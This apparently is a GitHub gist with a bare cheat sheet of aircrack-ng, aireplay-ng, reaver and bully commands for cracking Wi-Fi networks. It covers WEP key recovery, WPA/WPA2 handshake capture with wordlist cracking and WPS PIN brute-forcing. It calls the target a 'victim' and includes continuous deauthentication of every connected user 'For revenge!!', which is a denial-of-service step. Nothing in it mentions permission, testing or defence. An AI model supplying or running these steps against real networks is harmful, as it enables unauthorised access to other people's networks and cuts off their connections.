Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
WEP Protocol
>> iwconfig -> to see the wifi interface
>> airmon-ng -> to see the wifi drivers/drivers
>> airmon-ng start <wifi interface>
-> to make the airmon-ng monitor the wifi
-> it also shows the disturbances: kill it with >>kill (pid)
>> airodump-ng <MM IFace>
-> check for the victim wifi
-> after getting victim ctrl+c
new terminal
>> airodump-ng -c <channel no> --bssid <mac address> -w <file name> <MM>
let it run
new terminal
>> aircrack-ng <.cap file>
If stuck in waiting
>> aireplay-ng -3 -b <bssid> -h <connected user mac> <MM IFace>
--------------------------------------------------------------------------------
WPA/WPA2 Protocol
>> iwconfig
>> airmon-ng
>> airmon-ng start <wifi interface>
>> airodump-ng <MM IFace>
---create the wordlist of possible passwords
new terminal
>> airodump-ng -c <channel no> --bssid <mac address> -w <file name> <MM IFace>
---wait for *handshake*
new terminal
>> aircrack-ng -w <wordlist> <.cap file>
cannot get the handshake!!!
new terminal
disconnect a user for the handshake!
>> aireplay-ng -0 3 -a <bssid> -c <user mac> <MM IFace>
even cant!!
>> aireplay-ng -0 3 -a <bssid> <MM IFace> ----- disconnecting all with 3 times deauth
For revenge!!
>> aireplay-ng -0 0 -a <bssid> <MM IFace> ----- disconnecting all with continues deauth
--------------------------------------------------------------------------------
With WPS
>> iwconfig
>> airmon-ng
>> airmon-ng start <wifi interface>
>> airodump-ng <MM IFace>
>> wash -i <MM IFace>
if FCS enabled
>> wash -i <MM IFace> --ignore-fcs
To Crack
>> reaver -i <MM IFace> -b <bssid> -vv
Can Use This Too
>> bully -b <bssid> -c <channel> <MM IFace>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment